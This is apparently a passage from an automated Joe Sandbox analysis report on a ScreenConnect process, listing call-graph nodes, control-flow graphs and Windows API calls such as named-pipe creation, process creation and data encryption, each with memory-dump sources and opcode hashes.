43654 5a71832 CreateNamedPipeW 43653->43654 43655 5a717c8 43653->43655 43659 5a718f9 43654->43659 43668 5a7057c 43655->43668 43659->43649 43661 5a7171a 43660->43661 43662 5a71832 CreateNamedPipeW 43661->43662 43663 5a717c8 43661->43663 43667 5a718f9 43662->43667 43664 5a7057c CreateNamedPipeW 43663->43664 43666 5a71828 43664->43666 43666->43649 43667->43649 43669 5a71848 CreateNamedPipeW 43668->43669 43671 5a71828 43669->43671 43671->43649 43673 437005f 43672->43673 43676 4370510 3 API calls 43673->43676 43682 4370502 43673->43682 43674 43700d1 43674->43627 43676->43674 43678 437005f 43677->43678 43680 4370502 3 API calls 43678->43680 43681 4370510 3 API calls 43678->43681 43679 43700d1 43679->43627 43680->43679 43681->43679 43683 4370507 43682->43683 43686 4370536 43682->43686 43684 5a714a3 3 API calls 43683->43684 43685 5a714b0 3 API calls 43683->43685 43683->43686 43684->43686 43685->43686 43686->43674 43703 5a70040 43704 5a70093 CreateProcessAsUserW 43703->43704 43706 5a70124 43704->43706 43561 5a7498f 43565 5a71fe0 43561->43565 43568 5a71fe8 CloseHandle 43561->43568 43562 5a749ab 43566 5a71fe8 CloseHandle 43565->43566 43567 5a72052 43566->43567 43567->43562 43569 5a72052 43568->43569 43569->43562 43687 5a710fc 43689 5a70c90 43687->43689 43688 5a711cc 43688->43688 43689->43688 43690 4376730 3 API calls 43689->43690 43690->43689 43691 4375f68 43692 4375f8c 43691->43692 43694 4375f9c 43691->43694 43693 4375f95 43692->43693 43696 4376598 3 API calls 43692->43696 43697 4376598 43694->43697 43696->43692 43698 43765cb 43697->43698 43699 43765bb 43697->43699 43701 1c8f930 3 API calls 43698->43701 43700 43765c4 43699->43700 43702 1c8f930 3 API calls 43699->43702 43700->43692 43701->43699 43702->43699 43707 5a722c8 43708 5a72310 WaitNamedPipeW 43707->43708 43709 5a7230a 43707->43709 43710 5a72344 43708->43710 43709->43708 43836 5a71ed8 43837 5a71f2c ConnectNamedPipe 43836->43837 43838 5a71f68 43837->43838

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 174 5a7057c-5a7188a 176 5a71892-5a718f7 CreateNamedPipeW 174->176 177 5a7188c-5a7188f 174->177 179 5a71900-5a71921 176->179 180 5a718f9-5a718ff 176->180 177->176 180->179
                                                                      APIs
                                                                      • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05A718E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID: 4Lgq
                                                                      • API String ID: 2489174969-708016260
                                                                      • Opcode ID: 38c92a9214db10fd14546bb7b51fe7256cb26c6bf7d6aa36374f5781fbce7823
                                                                      • Instruction ID: 8d27c235ba232a3d9978b0a5533be953b0853769819260abc0922569b5e5df8e
                                                                      • Opcode Fuzzy Hash: 38c92a9214db10fd14546bb7b51fe7256cb26c6bf7d6aa36374f5781fbce7823
                                                                      • Instruction Fuzzy Hash: 4A3103B5901248DFDB10CF9AD888A8EBFF5FF48324F18C069E919AB221D375A855CF51
                                                                      APIs
                                                                      • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05A7010F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessUser
                                                                      • String ID:
                                                                      • API String ID: 2217836671-0
                                                                      • Opcode ID: 3beafbb8aa97db12702bcce2344c4a93cd25ad12c6d4ae1d54d73dbd085ebb1f
                                                                      • Instruction ID: f9798cdac2a3845d9b1ad54d5535080948384798c7b6674dcce43ff245703ce4
                                                                      • Opcode Fuzzy Hash: 3beafbb8aa97db12702bcce2344c4a93cd25ad12c6d4ae1d54d73dbd085ebb1f
                                                                      • Instruction Fuzzy Hash: C8411476900249DFCF10CFA9C884ADEBBF5FF48320F15852AE928A7250D775A955CF90
                                                                      APIs
                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 043717AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2606379214.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataProtect
                                                                      • String ID:
                                                                      • API String ID: 3091777813-0
                                                                      • Opcode ID: 0e255e5355c0fe283bbcbe4aabc8f87ac8b6c0f878a0c70e4ed42a63a858e2e3
                                                                      • Instruction ID: 1eb5c83077ebd2940f91c41e1a5e5ef5a7df9b80a0421d0393dafa0fb5ebe97a
                                                                      • Opcode Fuzzy Hash: 0e255e5355c0fe283bbcbe4aabc8f87ac8b6c0f878a0c70e4ed42a63a858e2e3
                                                                      • Instruction Fuzzy Hash: 802145B6800289DFDF20CF9AC844ADEBBF5FB88320F148419E954A7200D379A551DFA1
                                                                      APIs
                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 043717AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2606379214.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataProtect
                                                                      • String ID:
                                                                      • API String ID: 3091777813-0
                                                                      • Opcode ID: 21c747995db9e3c8ad9df4160c470b23f8da81582a66469aaec6ad67288c4b7a
                                                                      • Instruction ID: a769b3b24dcb02c37d10abde2c5366850ef6e12ce35b48c5559c3be0d52bff45
                                                                      • Opcode Fuzzy Hash: 21c747995db9e3c8ad9df4160c470b23f8da81582a66469aaec6ad67288c4b7a
                                                                      • Instruction Fuzzy Hash: CE2145B6800249DFDF10CF99C844ADEBBF1FB48320F148419E914A7200D339A551CFA1
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 060B2FF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: b22ef73f51aa58074192cc396dcdf516637c11bbd003f3c50b30095353e13418
                                                                      • Instruction ID: 008e723d6285397bbfb811538679a7f814f52b7029b16ff37ea63631854ff9f4
                                                                      • Opcode Fuzzy Hash: b22ef73f51aa58074192cc396dcdf516637c11bbd003f3c50b30095353e13418
                                                                      • Instruction Fuzzy Hash: 4B214772800289DFDB10CF99C944AEEBFF4EF48320F15845AE954A7211C339A555DFA5
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 060B2FF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: dd9a5e28f8320d63a97e97c99384ff9dacb78afd21d8adf74b8f9e7968a2f52e
                                                                      • Instruction ID: d419dae4151b7b68fa038e2bea3adf3bcc76f041b2c1a8afb4c52b80cc94977f
                                                                      • Opcode Fuzzy Hash: dd9a5e28f8320d63a97e97c99384ff9dacb78afd21d8adf74b8f9e7968a2f52e
                                                                      • Instruction Fuzzy Hash: 0221367680024ADFDB10CF99C844BEEBFF4EF48320F148459E914A7210C339A551DFA5
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 060B2FF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: fe512ebb9fb085dcb74f60d6c6b23492f38adfcb3061cef06508a22af9bf79a2
                                                                      • Instruction ID: e8c196d2a093bff18f5cbde724dbce374fcc1835765e0a70ed9d0d5321d21245
                                                                      • Opcode Fuzzy Hash: fe512ebb9fb085dcb74f60d6c6b23492f38adfcb3061cef06508a22af9bf79a2
                                                                      • Instruction Fuzzy Hash: 302122B680024ADFDF10CF99C945AEEBBF4EF48320F14841AE928A7210C339A551DFA5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 63 5a71720-5a717a6 73 5a717b1-5a717bd 63->73 74 5a717a8-5a717aa 63->74 76 5a717bf-5a717c6 73->76 77 5a717c8-5a717ca 73->77 74->73 76->77 78 5a717cc-5a717d3 76->78 79 5a717d8-5a71800 77->79 80 5a717d5 78->80 81 5a71832-5a7188a 78->81 83 5a71802-5a71807 79->83 84 5a71809 79->84 80->79 87 5a71892-5a718f7 CreateNamedPipeW 81->87 88 5a7188c-5a7188f 81->88 86 5a7180e-5a71823 call 5a7057c 83->86 84->86 91 5a71828-5a7182f 86->91 92 5a71900-5a71921 87->92 93 5a718f9-5a718ff 87->93 88->87 93->92
                                                                      APIs
                                                                      • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05A718E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID: 4Lgq$d/mq
                                                                      • API String ID: 2489174969-567034576
                                                                      • Opcode ID: 415c0ee4bcba91e96ba5b2cd6dbd9c43446cd68b859b6a61191f29b439f7d65b
                                                                      • Instruction ID: 78126601e59c1ea99d94dcdd0da94f7dbc48b62b5524c5dd0658fafa75a8afc7
                                                                      • Opcode Fuzzy Hash: 415c0ee4bcba91e96ba5b2cd6dbd9c43446cd68b859b6a61191f29b439f7d65b
                                                                      • Instruction Fuzzy Hash: 9361AE71A002099FDB14DFA9C944BAEBFF6BF88310F14846AE515AB391D7749905CB50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 96 1c84c6e-1c84cb3 101 1c84d02-1c84d08 96->101 102 1c84cb5-1c84cc4 call 1c84848 96->102 105 1c84d09-1c84dd8 RtlGetVersion 102->105 106 1c84cc6-1c84ccb 102->106 111 1c84dda-1c84de0 105->111 112 1c84de1-1c84e24 105->112 118 1c84cce call 1c852e8 106->118 119 1c84cce call 1c852f8 106->119 107 1c84cd4 107->101 111->112 116 1c84e2b-1c84e32 112->116 117 1c84e26 112->117 117->116 118->107 119->107
                                                                      APIs
                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 01C84DBE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2588171121.0000000001C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1c80000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: `Qgq$`Qgq
                                                                      • API String ID: 1889659487-3257814231
                                                                      • Opcode ID: ba531ff49bdb099fdefcf30d7499376e9de7650bf9c06288e7bbb45a18af6ec7
                                                                      • Instruction ID: 7f4c997470267be7f3694cbaa8294d45e7fd940d954c1b99d0f0d0cc9542f882
                                                                      • Opcode Fuzzy Hash: ba531ff49bdb099fdefcf30d7499376e9de7650bf9c06288e7bbb45a18af6ec7
                                                                      • Instruction Fuzzy Hash: AB41B271A01359DFEB649F68C8447AEBFB9FB45310F0041EAD508E7280DB745A44CF92

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 120 5a72d1c-5a72d84 122 5a72d86-5a72dab 120->122 123 5a72dd8-5a72e5b CreateFileA 120->123 122->123 126 5a72dad-5a72daf 122->126 132 5a72e64-5a72ea2 123->132 133 5a72e5d-5a72e63 123->133 127 5a72dd2-5a72dd5 126->127 128 5a72db1-5a72dbb 126->128 127->123 130 5a72dbf-5a72dce 128->130 131 5a72dbd 128->131 130->130 134 5a72dd0 130->134 131->130 138 5a72ea4-5a72ea8 132->138 139 5a72eb2 132->139 133->132 134->127 138->139 140 5a72eaa 138->140 141 5a72eb3 139->141 140->139 141->141
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05A72E45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 4Lgq
                                                                      • API String ID: 823142352-708016260
                                                                      • Opcode ID: e9abd6f658bbef218558d06816255c7c810222cc04ba268c4ab109b8d4df2165
                                                                      • Instruction ID: dcad176602677046621ab3c8639ef343084ef9baa9aa931cc8fd55e889895f46
                                                                      • Opcode Fuzzy Hash: e9abd6f658bbef218558d06816255c7c810222cc04ba268c4ab109b8d4df2165
                                                                      • Instruction Fuzzy Hash: AF5143B5D002599FDB10CFA9C984B9EBFF1FF48314F24812AE818AB351D7759885CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 142 5a707f4-5a72d84 144 5a72d86-5a72dab 142->144 145 5a72dd8-5a72e5b CreateFileA 142->145 144->145 148 5a72dad-5a72daf 144->148 154 5a72e64-5a72ea2 145->154 155 5a72e5d-5a72e63 145->155 149 5a72dd2-5a72dd5 148->149 150 5a72db1-5a72dbb 148->150 149->145 152 5a72dbf-5a72dce 150->152 153 5a72dbd 150->153 152->152 156 5a72dd0 152->156 153->152 160 5a72ea4-5a72ea8 154->160 161 5a72eb2 154->161 155->154 156->149 160->161 162 5a72eaa 160->162 163 5a72eb3 161->163 162->161 163->163
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05A72E45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 4Lgq
                                                                      • API String ID: 823142352-708016260
                                                                      • Opcode ID: d68644f96ac1884ccc8c340b95921d29dca118d32aca3e54b4a596b8ac01707c
                                                                      • Instruction ID: 2da4d018a2567661a40af9c656e51dff6baea99f8d8a349607eeabfa2fa81446
                                                                      • Opcode Fuzzy Hash: d68644f96ac1884ccc8c340b95921d29dca118d32aca3e54b4a596b8ac01707c
                                                                      • Instruction Fuzzy Hash: 3C5143B5D0025D9FDB10CFA9C944B9EBBF2FF48304F24812AE818AB351D7759985CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 164 5a70560-5a7188a 167 5a71892-5a718f7 CreateNamedPipeW 164->167 168 5a7188c-5a7188f 164->168 170 5a71900-5a71921 167->170 171 5a718f9-5a718ff 167->171 168->167 171->170
                                                                      APIs
                                                                      • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05A718E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID: 4Lgq
                                                                      • API String ID: 2489174969-708016260
                                                                      • Opcode ID: 8b3f00a15733ed9aedd9843758afd4f60ac704f4ebc347e224190cf0d3409c2f
                                                                      • Instruction ID: 70714e4e3492df44efb8c4cf736c635630ba185e4ce83970a1b247a182a97cec
                                                                      • Opcode Fuzzy Hash: 8b3f00a15733ed9aedd9843758afd4f60ac704f4ebc347e224190cf0d3409c2f
                                                                      • Instruction Fuzzy Hash: 613138B1805349DFCB11CFAAD884A8EBFF5FF49310F19806AE858AB212D7759445CF51
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 53d82f8e2ab5c21b37ccab18c6ad0ecd551a9104cb4a754971dcfa8c6f89b1e2
                                                                      • Instruction ID: f616975d23380b509ab112bcae5a52dcc92951508f2067a71c6ae1eff6843986
                                                                      • Opcode Fuzzy Hash: 53d82f8e2ab5c21b37ccab18c6ad0ecd551a9104cb4a754971dcfa8c6f89b1e2
                                                                      • Instruction Fuzzy Hash: 5D519F71A006058FCB64CFA9D8806EEBBF5EF88320F14892ED469E7641D735A945CBA0
                                                                      APIs
                                                                      • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05A7010F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessUser
                                                                      • String ID:
                                                                      • API String ID: 2217836671-0
                                                                      • Opcode ID: 3c0c1838eabe0fdaf1de3d26af24e1081b898e3eab6a1cc3ea1827767bfa78f6
                                                                      • Instruction ID: eb284c6f3e0e812dc3346db6569732b66d163b8ff7fd5f40f4d87445982b9ebc
                                                                      • Opcode Fuzzy Hash: 3c0c1838eabe0fdaf1de3d26af24e1081b898e3eab6a1cc3ea1827767bfa78f6
                                                                      • Instruction Fuzzy Hash: 294137B290034ADFDB11CFA9C884ADEBBF1FF49320F09846AE858A7250D3759955CF50
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 060B671E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: ef30d634eddf53cf9136d59907e886d153b10ee22ae12218323cabdb51693afc
                                                                      • Instruction ID: a6b0191bc402140463fe8ff5a355bf9dd25c61b63eac1eb758edf94c18a0871a
                                                                      • Opcode Fuzzy Hash: ef30d634eddf53cf9136d59907e886d153b10ee22ae12218323cabdb51693afc
                                                                      • Instruction Fuzzy Hash: EB2145B5C043899FCB11CFA9C840AEEFFF4AF49320F15849AD498A7241D3799546CF61
                                                                      APIs
                                                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 05A71F50
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: 6a32a9d9ecf590413720dc8153fcf14c47873d53c62bdcc8df40c827de4d98af
                                                                      • Instruction ID: 008521193cf7bcc002469eabffedbcb5384a78711fe3bda1e306f45e85033bad
                                                                      • Opcode Fuzzy Hash: 6a32a9d9ecf590413720dc8153fcf14c47873d53c62bdcc8df40c827de4d98af
                                                                      • Instruction Fuzzy Hash: 2A2114B1D102589FCB24CFAAC984A9EBFF5AF48314F14806AE869A7340D7749901CF90
                                                                      APIs
                                                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 05A71F50
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: ed3add0349deae74b7f8435f052801c7e3c52ec7023656e2ec5f72c0943a40d6
                                                                      • Instruction ID: 89e724635c90dd3f3f00f5f0659129d17c727f9fa000b79a1174343d79ddf24a
                                                                      • Opcode Fuzzy Hash: ed3add0349deae74b7f8435f052801c7e3c52ec7023656e2ec5f72c0943a40d6
                                                                      • Instruction Fuzzy Hash: 4D21E6B1D102589FCB14CF9AC984A9EBBF5BF48310F14805AE819A7350D7755945CF90
                                                                      APIs
                                                                      • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 060B663D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: EnumProcesses
                                                                      • String ID:
                                                                      • API String ID: 84517404-0
                                                                      • Opcode ID: adec1fc7ea5ec57bb7af34d615976c5b707f0d7425a5b8ccb234514e0043f09f
                                                                      • Instruction ID: ebb08de7320c12c5b4929ee417224b17491b3308c16af008a387bdbbe04429e1
                                                                      • Opcode Fuzzy Hash: adec1fc7ea5ec57bb7af34d615976c5b707f0d7425a5b8ccb234514e0043f09f
                                                                      • Instruction Fuzzy Hash: 402125B5D102499FDB10CF9AC885AEEFBF4EB48320F54842EE518B7340C779A945CBA5
                                                                      APIs
                                                                      • WaitNamedPipeW.KERNEL32(00000000), ref: 05A7232F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipeWait
                                                                      • String ID:
                                                                      • API String ID: 3146367894-0
                                                                      • Opcode ID: d9023be7ab0585c83a7716a75a9ac9210bec3e9cfabc048e711b4f79aa823e0a
                                                                      • Instruction ID: ac3ac277e86ddc0d513daa91132e27bd9dd04dc80eff2e4dd5bf5f45c4f6aa3a
                                                                      • Opcode Fuzzy Hash: d9023be7ab0585c83a7716a75a9ac9210bec3e9cfabc048e711b4f79aa823e0a
                                                                      • Instruction Fuzzy Hash: 6421F4B6C002498FDB10CF9AC844BEEBBF4EF48320F14846DD869A7240C779A545CFA1
                                                                      APIs
                                                                      • WaitNamedPipeW.KERNEL32(00000000), ref: 05A7232F
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipeWait
                                                                      • String ID:
                                                                      • API String ID: 3146367894-0
                                                                      • Opcode ID: fd7edff6524c7c867a87262e19d429bf6b224d5fff79f6fb37436c455c6be058
                                                                      • Instruction ID: eb18d98ea585d0c6a1efa074750d64d538f4864ac8473ef4a1a787cd4750f630
                                                                      • Opcode Fuzzy Hash: fd7edff6524c7c867a87262e19d429bf6b224d5fff79f6fb37436c455c6be058
                                                                      • Instruction Fuzzy Hash: A121E3B6C002498FDB10CF9AC944BAEBBF4EF48324F14846AD869B7241C779A545CFA1
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 060B671E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2615357866.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_60b0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: 0b857016c3227f293bf8ef6ccb6eb61d4fb89fe0eb722eda01c096e08ddf4ab6
                                                                      • Instruction ID: 853168b849053ba3aee922ffb21641ff8acc9ebe3ffc71442e43df7145ee88ac
                                                                      • Opcode Fuzzy Hash: 0b857016c3227f293bf8ef6ccb6eb61d4fb89fe0eb722eda01c096e08ddf4ab6
                                                                      • Instruction Fuzzy Hash: 0B1112B5C102498FDB20CF9AC844BEEFBF4EB48324F14846AD859B7240D779A945CFA5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: a29205196927330c276c1ea57aa295e8807cd5ae1f693ef9f8669c820fe71c3e
                                                                      • Instruction ID: 54272e3072141c091cf17e327a1b964f7600bdb8854ec469197d368b7b4b34e4
                                                                      • Opcode Fuzzy Hash: a29205196927330c276c1ea57aa295e8807cd5ae1f693ef9f8669c820fe71c3e
                                                                      • Instruction Fuzzy Hash: 5B1146B5C002498FDB20CF9AC945BDEBFF4EF48320F148459D528A7240D739A946CFA5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2613472972.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5a70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: dd0a620661914090dc098ab164f20cb385c0e6b087c72f6113cc5d4405d39ee6
                                                                      • Instruction ID: 5626b73088e124539d4ee567609efe7bda36e276daabff8247f19bf65dd577bf
                                                                      • Opcode Fuzzy Hash: dd0a620661914090dc098ab164f20cb385c0e6b087c72f6113cc5d4405d39ee6
                                                                      • Instruction Fuzzy Hash: D51125B5800249CFDB20CF9AC945BDEBFF8EF48320F148459D529A7241D739AA45CFA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2587253915.0000000001B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B4D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1b4d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f1ea982eeade8d44443cc472cb9e66e1672ae05349a5dbd3c08c231af75c382
                                                                      • Instruction ID: 1be93896784948ac6697fc571ec9f9c065cb3e81f2cbf049d5e075065c3f1138
                                                                      • Opcode Fuzzy Hash: 2f1ea982eeade8d44443cc472cb9e66e1672ae05349a5dbd3c08c231af75c382
                                                                      • Instruction Fuzzy Hash: FC213AB5504280DFDB09DF54D9C0B26BF65FBA8310F24C6ADE9090B256C336D416DBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2587253915.0000000001B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B4D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1b4d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
